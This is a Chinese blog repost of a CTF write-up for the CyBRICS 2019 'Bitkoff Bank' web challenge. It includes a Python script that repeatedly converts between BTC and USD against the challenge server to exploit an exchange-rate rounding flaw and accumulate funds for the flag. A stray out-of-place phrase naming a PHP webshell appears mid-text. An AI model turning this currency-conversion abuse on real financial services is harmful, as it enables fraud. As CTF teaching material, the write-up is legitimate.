热门标签
热门文章
- 1Android Studio 新手教程,2024年最新面试官没礼貌
- 2用C语言实现一个线程池_c语言线程池的实现
- 3Python: 如何绘制核密度散点图和箱线图?_python 箱线图
- 4解决command “python setup.py egg_info“ failed with error code 1
- 5顺利上岸字节电商后端,但也真的很不顺利
- 63 万 Star!一键将 Notion 替换为强大的开源产品 AFFINE
- 7命令执行漏洞(附例题)_哪个函数不能导致远程命令执行漏洞
- 8ROS学习记录:使用RViz观测激光雷达传感器数据_ros激光雷达数据读取
- 9数据结构—查找(Part Ⅱ)—红黑树_红黑树查找
- 10开发BLE蓝牙手机上位机软件竟是如此的简单_蓝牙上位机开发
当前位置: article > 正文
实战:CyBRICS CTF Quals 2019 Web Writeup_金砖web赛题讲解
作者:AllinToyou | 2024-05-26 22:33:18
赞
踩
金砖web赛题讲解
前言
周末参加了LCBC主办的2019 CyBRICS CTF Quals,在金砖五国中,获得了top5的成绩,以下是web的题解。
Bitkoff Bank
点一次mine btc,获得0.0000000001 BTC,而购买auto-miner需要0.1 USD。
购买auto-miner后,我们的网页会多出这样一个script,每秒帮我们点击1000次,但实际上并非1秒能获得这么多BTC:
然后获取flag需要1USD,显然即便依靠auto-miner也是遥遥无期的。PHP大马
通过做题的经验,给了的功能一般不会白给,我们测试一下转换功能,发现不断将BTC转成USD,将USD转成BTC,就会因为汇率问题就会不断加钱,写脚本即可:
import requests
import re
url = 'http://95.179.148.72:8083/index.php'
cookie = {
'name':'yyplsky',
'password':'yyplskycool'
}
def GetUSD():
while True:
try:
r = requests.get(url,cookies=cookie,timeout=3)
res = r.content
res = re.findall(r'<b>([0-9\.]*)</b><br>',res)
return res[0]
except:
pass
def USD_to_BTC(USD):
data = {
'from_currency':'usd',
'to_currency':'btc',
'amount':USD
}
while True:
try:
r = requests.post(url,data=data,cookies=cookie,timeout=3)
break
except:
pass
def GetBTC():
while True:
try:
r = requests.get(url,cookies=cookie,timeout=3)
res = r.content
res = re.findall(r'<b>([0-9\.]*)</b><br>',res)
return res[1]
except:
pass
def BTC_to_USD(BTC):
data = {
'from_currency':'btc',
'to_currency':'usd',
'amount':BTC
}
while True:
try:
r = requests.post(url,data=data,cookies=cookie,timeout=3)
break
except:
pass
for i in range(200):
USD = GetUSD()
print USD
USD_to_BTC(USD)
BTC = GetBTC()
print BTC
BTC_to_USD(BTC)
通过来回转钱,跑差不多十分钟就够$1 USD,可以购买flag了。
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/AllinToyou/article/detail/628700
推荐阅读
相关标签
